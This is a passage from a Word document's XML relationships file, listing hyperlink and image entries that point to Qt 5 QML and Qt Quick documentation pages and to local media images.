Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listelement.html" TargetMode="External"/><Relationship Id="rId2785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/radiooverview.html" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-integratingjs.html" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-binding.html" TargetMode="External"/><Relationship Id="rId964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-grid.html" TargetMode="External"/><Relationship Id="rId1387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-toolbar.html" TargetMode="External"/><Relationship Id="rId1594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickdialogs-index.html" TargetMode="External"/><Relationship Id="rId2200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-index.html" TargetMode="External"/><Relationship Id="rId2438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId2645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/sql-model.html" TargetMode="External"/><Relationship Id="rId2852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquicktexturefactory.html" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-circulargauge.html" TargetMode="External"/><Relationship Id="rId1247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-route.html" TargetMode="External"/><Relationship Id="rId1454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginehistorylistmodel.html" TargetMode="External"/><Relationship Id="rId1661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId1899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-visualparent.html" TargetMode="External"/><Relationship Id="rId2505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId2712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-multisampleantialiasing.html" TargetMode="External"/><Relationship Id="rId1314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-stackview.html" TargetMode="External"/><Relationship Id="rId1521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId1759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId1619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId2088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-anchors.html" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-index.html" TargetMode="External"/><Relationship Id="rId2155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-number.html" TargetMode="External"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-calendar.html" TargetMode="External"/><Relationship Id="rId986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-hpiemodelmapper.html" TargetMode="External"/><Relationship Id="rId2362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-column.png" TargetMode="External"/><Relationship Id="rId2667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-qmlextensionplugins-example.html" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-menustyle.html" TargetMode="External"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pinchevent.html" TargetMode="External"/><Relationship Id="rId1269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-seamlesscubemap.html" TargetMode="External"/><Relationship Id="rId1476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-xypoint.html" TargetMode="External"/><Relationship Id="rId2015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-keyicon.html" TargetMode="External"/><Relationship Id="rId1129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-orbitcameracontroller.html" TargetMode="External"/><Relationship Id="rId1683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html" TargetMode="External"/><Relationship Id="rId1890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html" TargetMode="External"/><Relationship Id="rId1988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId2941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-accelerometerreading.html" TargetMode="External"/><Relationship Id="rId913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-enterkeyaction.html" TargetMode="External"/><Relationship Id="rId1336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-surface3d.html" TargetMode="External"/><Relationship Id="rId1543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId1610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-closeevent.html" TargetMode="External"/><Relationship Id="rId1848" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId1708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-cppplugins.html" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flow.html" TargetMode="External"/><Relationship Id="rId2591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-expressions.html" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-buffer.html" TargetMode="External"/><Relationship Id="rId1193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-pressurereading.html" TargetMode="External"/><Relationship Id="rId2037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId2451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-smoothedanimation.html" TargetMode="External"/><Relationship Id="rId2689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/metaobjects.html" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-custom3dvolume.html" TargetMode="External"/><Relationship Id="rId1053" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-scene3d.html" TargetMode="External"/><Relationship Id="rId1498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-adaptations.html" TargetMode="External"/><Relationship Id="rId2549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId2756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-text.html" TargetMode="External"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qurl.html" TargetMode="External"/><Relationship Id="rId728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animation.html" TargetMode="External"/><Relationship Id="rId935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-fontdialog.html" TargetMode="External"/><Relationship Id="rId1358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-targetdirection.html" TargetMode="External"/><Relationship Id="rId1565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId2311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/edges_qml.png" TargetMode="External"/><Relationship Id="rId2409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-qmlglobalobject.html" TargetMode="External"/><Relationship Id="rId1120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-normaldiffusespecularmapmaterial.html" TargetMode="External"/><Relationship Id="rId1218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-radiobuttonstyle.html" TargetMode="External"/><Relationship Id="rId1425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-vboxplotmodelmapper.html" TargetMode="External"/><Relationship Id="rId2823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId1632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1937" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-textinput.html" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId3012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-font.html" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-customparticle.html" TargetMode="External"/><Relationship Id="rId792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-camerarecorder.html" TargetMode="External"/><Relationship Id="rId2059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId2266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId2473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId2680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-index.html" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId1075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-maskedblur.html" TargetMode="External"/><Relationship Id="rId1282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-shellsurfaceitem.html" TargetMode="External"/><Relationship Id="rId2126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchoranimation.html" TargetMode="External"/><Relationship Id="rId2540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-build-example-application.html" TargetMode="External"/><Relationship Id="rId2778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-examples.html" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html" TargetMode="External"/><Relationship Id="rId957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-glstatedumpext.html" TargetMode="External"/><Relationship Id="rId1142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId1587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId2400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animator.html" TargetMode="External"/><Relationship Id="rId2638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId2845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgopaquetexturematerial.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-categoryrange.html" TargetMode="External"/><Relationship Id="rId1002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-instantiator.html" TargetMode="External"/><Relationship Id="rId1447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandview.html" TargetMode="External"/><Relationship Id="rId1654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-age.html" TargetMode="External"/><Relationship Id="rId2705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sprite.html" TargetMode="External"/><Relationship Id="rId1514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-messagedialog.html" TargetMode="External"/><Relationship Id="rId2190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-doublevalidator.html" TargetMode="External"/><Relationship Id="rId2495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwidgets-animation-easing-example.html" TargetMode="External"/><Relationship Id="rId3034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId467" 